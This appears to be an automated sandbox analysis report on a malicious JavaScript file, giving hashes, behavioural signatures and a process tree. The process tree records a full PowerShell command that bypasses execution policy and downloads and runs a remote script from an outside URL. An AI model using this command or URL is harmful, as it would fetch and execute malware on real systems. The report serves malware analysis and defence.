Analysis
-
max time kernel
120s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:24
Static task
static1
Behavioral task
behavioral1
Sample
6a1f9cd96e83e128052256853176ae7162abdebc72b93fdb5f32eae53cf9e119.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
6a1f9cd96e83e128052256853176ae7162abdebc72b93fdb5f32eae53cf9e119.js
Resource
win10v2004-20240226-en
General
-
Target
6a1f9cd96e83e128052256853176ae7162abdebc72b93fdb5f32eae53cf9e119.js
-
Size
64KB
-
MD5
2ef941216fe750eeed4fb1679c93370d
-
SHA1
d51d80623ef091ad40b97c7afe8285d4d196d74f
-
SHA256
6a1f9cd96e83e128052256853176ae7162abdebc72b93fdb5f32eae53cf9e119
-
SHA512
40f69f58aac11499d10b43b3a6aeea241bfbb633dd69803accb2bb041f1a656f62d96d36f9bc1a5d4dedba15ddc2afa56f641a9cd3ccd746b82f2028786669ef
-
SSDEEP
1536:p4s1HFEa+GiVYDUaTlMd8lXG3esO6BEgIlofHxYSAZ580weXxdUJHRROiI0oMQqE:b1HFf+3jiPtsO6BEgIlofRYSAZ580weZ
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2564 powershell.exe 4 2564 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2720 wrote to memory of 2564 2720 wscript.exe 28 PID 2720 wrote to memory of 2564 2720 wscript.exe 28 PID 2720 wrote to memory of 2564 2720 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\6a1f9cd96e83e128052256853176ae7162abdebc72b93fdb5f32eae53cf9e119.js1⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-